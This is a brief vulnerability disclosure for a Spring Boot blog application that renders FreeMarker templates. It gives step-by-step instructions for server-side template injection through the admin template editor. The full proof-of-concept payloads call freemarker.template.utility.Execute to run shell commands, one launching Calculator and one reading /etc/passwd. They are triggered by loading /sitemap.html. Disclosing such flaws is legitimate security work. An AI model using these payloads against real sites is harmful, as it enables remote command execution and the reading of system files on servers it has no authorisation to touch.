1. Reference the spring-boot-starter-freemarker component in the blog-core/pom.xml file.
   

2. The vulnerability point is in the backend website management-template management department. Find the TM_SITEMAP_HTML file and write it into the POC.

<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
<#assign value="freemarker.template.utility.Execute"?new()>${value("cat /etc/passwd")}

3.After saving, visit the homepage to find the site map below and click to trigger. You can also directly access /sitemap.html to trigger the vulnerability.